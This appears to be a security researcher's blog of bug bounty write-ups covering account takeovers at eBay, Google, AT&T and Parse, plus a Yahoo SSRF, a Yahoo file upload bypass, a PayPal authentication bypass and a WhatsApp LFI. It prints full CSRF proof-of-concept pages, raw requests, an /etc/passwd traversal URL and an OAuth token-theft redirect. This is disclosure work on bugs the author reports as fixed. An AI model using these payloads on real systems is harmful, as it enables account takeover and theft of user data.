In evidenza

Ebay: From CSRF to Full Takeover Account of any user

 

 

After the Ebay Data Breach i started looking for that bug that may have been exploited from hackers to steal credentials of more that 100 million Ebay user’s account.So i focused my attention on the Ebay recovery account procedures.If you are already a Ebay user you can reset the password of your account through three procedures:

1) Email Address:An email to the registered email-address will be sent with a reset link

2)SMS: An SMS with a 4-digits PIN will be sent from Ebay to the registered phone number

3)Phone call: A phone call will be made from Ebay to reset password of the Ebay user’s account

The bug i found is in the SMS procedure.This CSRF bug allows me to set a new phone number in the victim’s account and subsequently i can use the SMS procedure to obtain the PIN to reset password of Ebay victim’s account.To set a new phone number in our Ebay account we have to:

1)Go to https://scgi.ebay.it/ws/eBayISAPI.dll?ChangeRegistrationShow

2)Fill in all the forms with the desired values

3)Click on the button to save changes

Schermata del 2014-06-04 12:27:19

Once clicked on it a POST request like the following will be generated:

POST   https://scgi.ebay.it/ws/eBayISAPI.dll

Host: scgi.ebay.it
User-Agent: myuseragent
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate
Referer: https://scgi.ebay.it/ws/eBayISAPI.dll?ChangeRegistrationPreview
Cookie: mycookies
Connection: keep-alive
Content-Type: application/x-www-form-urlencoded
Content-Length: 758

MfcISAPICommand=ChangeRegistration&userid=&pass=&mid=&hmid=&firstname=Andrea&lastname=Santese&middleinitial=&nameAlt=&nameAlt2=&name=Andrea++Santese&company=&address=via+A.AAAAA&city=Maglie&state=LE&fullnameAlt=&companyAlt=&addressAlt=11&cityAlt=&stateAlt=&zip=73024&country=Italia&countryid=101&dayphone=++32709869473270986947+&nightphone=+++&faxphone=&dayphone1=3270986948&dayphone2=&dayphone3=&dayphone4=&nightphone1=&nightphone2=&nightphone3=&nightphone4=&gender=Non+specificato&billingcurrency=7&personalId=&personalIdType=&bizTypeCode=&bizNumber1=&bizNumber2=&taxIdNumber=&accountOperatorName=&srt=01000100000040018e9fb8c3652034dfa260bc532183a8ddb8b0625bb39c554c5798fd1ae45a250dfdbd26d445eda420b25052c714e49cabe4a038ceee0436e85ec32fb6903c4f&salutation=

The first time i look at this POST request i noticed that there was the “srt” parameter and i thought it was an anti-CSRF token but after few attempts i noticed that the “srt” parameter and its value are not checked from server so they can be omitted.So i realized an HTML page that once clicked by the victim, will set a new phone number (attacker’s phone number) in the victim’s account.

This is the POC:

<html>

<body>

<form method=”POST” name=”form0″ action=”https://scgi.ebay.it:443/ws/eBayISAPI.dll”>
<input type=”hidden” name=”MfcISAPICommand” value=”ChangeRegistration”/>
<input type=”hidden” name=”userid” value=””/>
<input type=”hidden” name=”pass” value=””/>
<input type=”hidden” name=”mid” value=””/>
<input type=”hidden” name=”hmid” value=””/>
<input type=”hidden” name=”firstname” value=”firstname”/>
<input type=”hidden” name=”lastname” value=”lastname”/>
<input type=”hidden” name=”middleinitial” value=””/>
<input type=”hidden” name=”nameAlt” value=””/>
<input type=”hidden” name=”nameAlt2″ value=””/>
<input type=”hidden” name=”name” value=”firstname lastname”/>
<input type=”hidden” name=”company” value=””/>
<input type=”hidden” name=”address” value=”via A.AAAAA”/>
<input type=”hidden” name=”city” value=”city”/>
<input type=”hidden” name=”state” value=”state”/>
<input type=”hidden” name=”fullnameAlt” value=””/>
<input type=”hidden” name=”companyAlt” value=””/>
<input type=”hidden” name=”addressAlt” value=”11″/>
<input type=”hidden” name=”cityAlt” value=””/>
<input type=”hidden” name=”stateAlt” value=””/>
<input type=”hidden” name=”zip” value=”zipcode”/>
<input type=”hidden” name=”country” value=”Italia”/>
<input type=”hidden” name=”countryid” value=”101″/>
<input type=”hidden” name=”dayphone” value=”  dayphonr”/>
<input type=”hidden” name=”nightphone” value=””/>
<input type=”hidden” name=”faxphone” value=””/>
<input type=”hidden” name=”dayphone1″ value=”dayphone1″/>
<input type=”hidden” name=”dayphone2″ value=””/>
<input type=”hidden” name=”dayphone3″ value=””/>
<input type=”hidden” name=”dayphone4″ value=””/>
<input type=”hidden” name=”nightphone1″ value=””/>
<input type=”hidden” name=”nightphone2″ value=””/>
<input type=”hidden” name=”nightphone3″ value=””/>
<input type=”hidden” name=”nightphone4″ value=””/>
<input type=”hidden” name=”gender” value=”Non specificato”/>
<input type=”hidden” name=”billingcurrency” value=”7″/>
<input type=”hidden” name=”personalId” value=””/>
<input type=”hidden” name=”personalIdType” value=””/>
<input type=”hidden” name=”bizTypeCode” value=””/>
<input type=”hidden” name=”bizNumber1″ value=””/>
<input type=”hidden” name=”bizNumber2″ value=””/>
<input type=”hidden” name=”taxIdNumber” value=””/>
<input type=”hidden” name=”accountOperatorName” value=””/>
<input type=”hidden” name=”salutation” value=””/>
</form>

</body>
</html>

Once the victim has clicked on this HTML page a new phone number will be setted in the victim’s account and the attacker can subsequently reset password of the victim’s account through the SMS procedure.

This is the Video PoC:

The bug has now been fixed.

 

In evidenza

Google:From Privilege Escalation Vulnerability to Full Takeover Account

 

In this Write-Up i’ll explain how i was able to reset password and have full access to any Google user’s account that haven’t security question enabled.

This is the Bug Report i sent to Google Security Team.

I’ve found a huge bug in Gmail.I’ve found a way to have full access to a Gmail account with no victim’s interaction.This bug can be exploited if the victim hasn’t setted the security question.
These are the steps to reproduce the issue:
1)Go to https://www.google.com/accounts/recovery/?hl=en
Click on “I don’t know my password”   Now in the “Email address” form we have to insert the victim’s gmail email address and subsequently click on the “Continue” button
2)Now in the new page in the “Enter the last password you remember” we have to insert a random password (in my case i’ve used 1122334455)  and subsequently click on the “Continue” button.
3)Now in the new page you can see this message “Can’t access any of these recovery options? Verify your identity by answering multiple questions about your account.” so click on the “Verify your identity” link
4)Now in the “Enter an email address where we can contact you if necessary (Required)” form we have to insert the attacker’s gmail email
and in the “Re-enter email address (Required)” we have to insert again the attacker’s gmail email and subsequently click on the “Continue” button.
5)Now in the “Last password you remember (Required)” form we have to insert a random password (in my case i’ve used 1122334455)
In the “When was the last time you were able to sign in to your Google Account? (Required)” we have to choose a random date (in my case i’ve chosen ‘March 1 1991’)
In the “When did you create your Google Account? (Required)” form we have to choose a random date (in my case i’ve chosen ‘March 1991’)
Now click on the “Continue” button.
6)Now in the new page click on the “Skip these questions” button without answering to the questions.
7)Now in the new page click on the “Submit” button.
When we click on the “Submit” button an email will be sent to the attacker gmail email with the link to reset the password of the victim’s gmail email
.Now the attacker has full access to the victim’s profile.With this bug i can reset the Gmail password of all users that have not setted the security question.

The bug has now been fixed.This is the Video PoC

In evidenza

Yahoo! SSRF/XSPA Vulnerability

 

 

First of describing how i was able to find this bug, i would prefer to introduce the SSRF/XSPA Vulnerability.

An application is vulnerable to Cross Site Port Attacks if the application processes user supplied URLs and does not verify/sanitize the backend response received from remote servers before sending it back to the client. An attacker can send crafted queries to a vulnerable web application to proxy attacks to external Internet facing servers, intranet devices and the web server itself using the advertised functionality of the vulnerable web application. The responses, in certain cases, can be studied to identify service availability (port status, banners etc.) and even fetch data from remote services in unconventional ways.XSPA allows attackers to target the server infrastructure, mostly the intranet of the web server, the web server itself and any public Internet facing server as well. This Vulnerability can be used for:
1) Port Scanning remote Internet facing servers, intranet devices and the local web server itself. Banner grabbing is also possible in some cases.
2) Exploiting vulnerable programs running on the Intranet or on the local web server
3) Fingerprinting intranet web applications using standard application default files & behavior
4) Attacking internal/external web applications that are vulnerable to GET parameter based vulnerabilities (SQLi via URL, parameter manipulation etc.)
5) Reading local web server files using the file:/// protocol handler.

In this blogpost i’m describing how i used the Yahoo! Server to portscan a remote host to see if a port is in open,filtered or closed state.This is the Bug Report i sent to Yahoo! Security.

I’ve found a SSRF in http://add.yahoo.com
These are the steps to reproduce the issue:
1)Go to http://dir.yahoo.com/recreation/games/video_games/titles/action/
2)Now click on the “Suggest a Site” button and subsequently click on the “Standard Consideration”
3)Now click on the “Continue” button
Now in this page we have to fill in 4 forms.In the “Site Title” i’ve inserted ‘asdf’ as value
Now in the “Security Email ID” and “Contact Person” forms we have to insert values of our choice.
Now in the “URL” form we have to insert the target site to see if a certain port is in state filtered,open or closed
Let’s suppose that the port 20 of www.targeturl.com is closed,so in the “URL” form we have to insert “http://www.targeturl.com:20
Now that we have filled in all the form values we have to click on the “Submit” button.Now we will receive an error like this “The following resulted when trying to access your document:

connect: Connection refused” telling us that the port is closed.
Let’s suppose that the port 23 of www.targeturl.com is filtered,so in the “URL” form we have to insert “http://www.targeturl.com:23
if the port is filtered we will receive the following message “The following resulted when trying to access your document:

Request Timeout”
Let’s suppose that the port 21 of www.targeturl.com is open,so in the “URL” form we have to insert “http://www.targeturl.com:21
If the port is open we will receive the following message “Document contains no data”.Based on these three errors we can understand if a port of a remote host is open,filtered or closed.

Now the bug has been fixed.To write this blogpost I referred to this article which is in my opinion one of the best tutorial on SSRF/XSPA Vulnerability.

This is the Video PoC:

 

In evidenza

Yahoo! Unrestricted File Upload Vulnerability

 

 

 

Hi all,

In this Write-Up i’ll explain how i was able to find an Unrestricted File Upload in https://reports-as.web.analytics.yahoo.com/

This is the PoC i sent to Yahoo! Security.

These are the steps to reproduce the issue:
1)Login at yahoo.com
2)Once logged in we have to go to https://reports-as.web.analytics.yahoo.com/Login.vm and subsequently click on “Manage Scheduled Reports”
3)Now we have to click on the “Do you want to change your company logo that appears on HTML and PDF reports?” button.This section allows only the upload of images that have .gif, .jpg, .png extensions.I’ve found a way to bypass this restriction uploading a TXT file which is a.txt that contains the following content “Yahoo Server Unrestricted File Upload by Andrea Santese” and renaming it with a.txt.jpg
So we have to upload this file and subsequently click on the “Upload” button.Once we uploaded it a message like this “Image file is uploaded successfully!” will appear,so the file is uploaded.I notice that the file we have uploaded is located at https://reports-as.web.analytics.yahoo.com/servlet/template/LogoServer
But when we go to this link an error like the following will appear ” The image “https://reports-as.web.analytics.yahoo.com/servlet/template/LogoServer” cannot be displayed because it contains errors.”
This error is due to the “Content-Type:image/jpeg” that the Yahoo Server send to the client that makes a GET request to https://reports-as.web.analytics.yahoo.com/servlet/template/LogoServer  ,so now we have to change it into “Content-Type:text/html”.We can do this using a proxy like Burpsuite intercepting the response that the Yahoo Server send to the client and modifying on the fly the Content-Type into text/html.So we have to configure our browser to use the bursuite proxy.Once configured we have to make a GET request to https://reports-as.web.analytics.yahoo.com/servlet/template/LogoServer.Before deciding if we have to click on the “Forward” or “Drop” button,we have to right click on the Raw request and subsequently select “Do Intercept”—->”Response to this request”.Now we have to click on the “Forward” button.Once clicked on it we will have a response like the following:

HTTP/1.1 200 OK
Date: Wed, 26 Mar 2014 10:32:01 GMT
P3P: policyref=”http://info.yahoo.com/w3c/p3p.xml“, CP=”CAO DSP COR CUR ADM DEV TAI PSA PSD IVAi IVDi CONi TELo OTPi OUR DELi SAMi OTRi UNRi PUBi IND PHY ONL UNI PUR FIN COM NAV INT DEM CNT STA POL HEA PRE LOC GOV”
Last-Modified: Wed, 26 Mar 2014 10:32:02 GMT
Expires: Wed, 26 Mar 2014 10:32:02 GMT
Accept-Ranges: bytes
Cache-Control: no-store, no-cache, must-revalidate, max-age=0, proxy-revalidate, no-transform, pre-check=0, post-check=0, prPragma: no-cache, private
Connection: close
Content-Type: image/jpg
Content-Length: 57

Yahoo Server Unrestricted File Upload by Andrea Santese

Now we have to change the Content-Type: image/jpg into Content-Type: text/html and subsequently click on the “Forward” button

Now the content of the a.txt.jpg file will come up!

PayPal Merchant Launch Site: Authentication Bypass Vulnerability

 

While most applications require authentication to gain access to private information or to execute tasks, not every authentication method is able to provide adequate security. Negligence, ignorance, or simple understatement of security threats often result in authentication schemes that can be bypassed by simply skipping the log in page and directly calling an internal page that is supposed to be accessed only after authentication has been performed. In addition, it is often possible to bypass authentication measures by tampering with requests and tricking the application into thinking that the user is already authenticated. This can be accomplished either by modifying the given URL parameter, by manipulating the form, or by counterfeiting sessions.

In this Write-Up i’ll describe how i hacked BillMeLater’s Merchant Launch Site logging into Admin Account exploiting an Authentication Bypass Vulnerability and what this bug allowed me to do once logged in.

Steps required to reproduce the issue:

After some DNS-bruteforcing i found this BillMeLater’s subdomain:

https://launch.billmelater.com

Photo 1

Once clicked on “Login” i have been redirected to https://launch.billmelater.com/Home/tabid/36/ctl/Login/Default.aspx?returnurl=/default.aspx
so i started playing with this URL deleting “?returnurl=/default.aspx” from the URL above.
So this is the New URL:

https://launch.billmelater.com/Home/tabid/36/ctl/Login/Default.aspx

My attention was attracted by the “Login” directory so i started to manually fuzz the URL changing “Login” with “Register”

https://launch.billmelater.com/Home/tabid/36/ctl/Register/Default.aspx

Once submitted the request i received a “302” Status code so the link is accessible only if logged in.

photo 2

So i thought to use a Mozilla Firefox add-on called “NoRedirect” to not redirects me to the login page.

photo 3

Now if i go to https://launch.billmelater.com/Home/tabid/36/ctl/Register/Default.aspx i will be logged in as Administrator and i can execute operations like if i were the Administrator.

Photo 4

Now the bug has been fixed and here’s a video of the process of exploiting this vulnerability:

WhatsApp: LFI Vulnerability

Before starting to describe the issue found on WhatsApp i want to introduce the LFI Vulnerability.

The File Inclusion vulnerability allows an attacker to include a file, usually exploiting a “dynamic file inclusion” mechanisms implemented in the target application. The vulnerability occurs due to the use of user-supplied input without proper validation.
This can lead to something as outputting the contents of the file, but depending on the severity, it can also lead to:

  • Code execution on the web server
  • Code execution on the client-side such as JavaScript which can lead to other attacks such as cross site scripting (XSS)
  • Denial of Service (DoS)
  • Sensitive Information Disclosure

Local File Inclusion (also known as LFI) is the process of including files, that are already locally present on the server, through the exploiting of vulnerable inclusion procedures implemented in the application. This vulnerability occurs, for example, when a page receives, as input, the path to the file that has to be included and this input is not properly sanitized, allowing directory traversal characters (such as dot-dot-slash) to be injected. Although most examples point to vulnerable PHP scripts, we should keep in mind that it is also common in other technologies such as JSP, ASP and others.

The vulnerable link that allows me to download the /etc/passwd file is :

http://media.whatsapp.com/directory/..%252f..%252f..%252f..%252fetc%252fpasswd


and this is the content of the /etc/passwd file

The bug has now been fixed.

AT&T : From CSRF to Full Takeover Account of any user

 

This is the PoC i sent to AT&T

I’ve found a CSRF bug that may lead to full takeover account of a M2X AT&T user account
These are the steps to reproduce the issue:
1)Login into https://m2x.att.com/login
2)Once logged in we have to go to https://m2x.att.com/account
In this page we can see “First Name”,”Last Name”,”Email” forms.If we try to change the values of these forms and subsequently click
on the “Save Changes” button a POST request like this will be generated with no anti-CSRF token:

POST https://m2x.att.com/account

Host: m2x.att.com
User-Agent: Mozilla/5.0 (X11; Linux x86_64; rv:22.0) Gecko/20100101 Firefox/22.0 Iceweasel/22.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate
Referer: https://m2x.att.com/account
Cookie: mycookies
Connection: keep-alive
Content-Type: application/x-www-form-urlencoded
Content-Length: 115

first_name=marco1&last_name=cariddi&email=sangunazzu@gmail.com&current_password=&password=&password_confirmation=

There is no anti-CSRF token so it’s vulnerable to CSRF.So now i can create an ad-hoc HTML page like the following to set the value of the
“email” parameter with the email of the attacker.Once the victim has visited the HTML page,the new attacker’s email will be saved in the
victim account and subsequently the attacker could make a Reset password at this page https://m2x.att.com/forgot-password.
So now an email will be sent to the attacker’s email and now the attacker can reset password of the victim’s account.

This is the CSRF Final POC:

<!DOCTYPE HTML PUBLIC “-//W3C//DTD HTML 4.01 Transitional//EN”>

<html>
<head>
<title>How i  Hacked AT&T</title>
</head>

<body onload=”javascript:fireForms()”>
<script language=”JavaScript”>
var pauses = new Array( “1824” );

function pausecomp(millis)
{
var date = new Date();
var curDate = null;

do { curDate = new Date(); }
while(curDate-date < millis);
}

function fireForms()
{
var count = 1;
var i=0;

for(i=0; i<count; i++)
{
document.forms[i].submit();

pausecomp(pauses[i]);
}
}

</script>
<H2>How i  Hacked AT&T</H2>
<form method=”POST” name=”form0″ action=”https://m2x.att.com:443/account”>
<input type=”hidden” name=”first_name” value=”marco1″/>
<input type=”hidden” name=”last_name” value=”cariddi”/>
<input type=”hidden” name=”email” value=”sangunazzu@gmail.com”/>
<input type=”hidden” name=”current_password” value=””/>
<input type=”hidden” name=”password” value=””/>
<input type=”hidden” name=”password_confirmation” value=””/>
</form>

</body>
</html>

 

Facebook’s Parse OAuth2 Bug

In this post i’m going to show how i was able to hack into Parse accounts via OAuth vulnerability.
You can sign in into Parse by inserting your email and password or signing in with your Facebook account.

 

 

If we click on the “Log in with Facebook” button, a GET request is generated at this URL:

https://www.facebook.com/dialog/oauth?response_type=code&client_id=506576959379594&redirect_uri=https%3A%2F%2Fwww.parse.com%2Fauth%2Ffacebook%2Fcallback&state=3c580f78d588e40668b80dc9b1e310db576cc830e0d02d08&scope=email

 

The parameters that we have to consider are:

  • response_type
  • client_id 
  • redirect_uri 
  • scope 

So i started to create a forged URL that redirects the victim to a malicious site which saves the Parse token in a file.To do this,i started playing with the redirect_uri parameter to see if it allows access to subdomains or subfolders,and this was the result.



Allow request: 

  • xxx.parse.com                                   (Allow redirect to subdomains)
  • xxx.parse.com/xxx/                            (Allow redirect to subfolders)

 

I noticed that the redirect_uri allow access to subdomains and subfolders, so i looked for open redirect vulnerability in Parse’s domain and subdomains but i coulnd’t find anything.

I realized that Parse’s subdomains files.parse.com allows me to upload an html file, so i uploaded an html file which has some html code which redirects me to a malicious URL.The output URL to see the content of the page was:
http://files.parse.com/07c3d9cb-7a00-48c1-81d2-51d1f90bd8ad/68f9cc54-b661-4448-a4bb-0f413a1bcf8e-wow.html

Final POC (Facebook already fix this issue)

(Facebook Already fixed this issue):
https://www.facebook.com/dialog/oauth?response_type=token&client_id=506576959379594&redirect_uri=http://files.parse.com/07c3d9cb-7a00-48c1-81d2-51d1f90bd8ad/68f9cc54-b661-4448-a4bb-0f413a1bcf8e-wow.html&state=3c580f78d588e40668b80dc9b1e310db576cc830e0d02d08&scope=email

This URL will redirect the user to the site which has a script that takes the token and will save it in a file.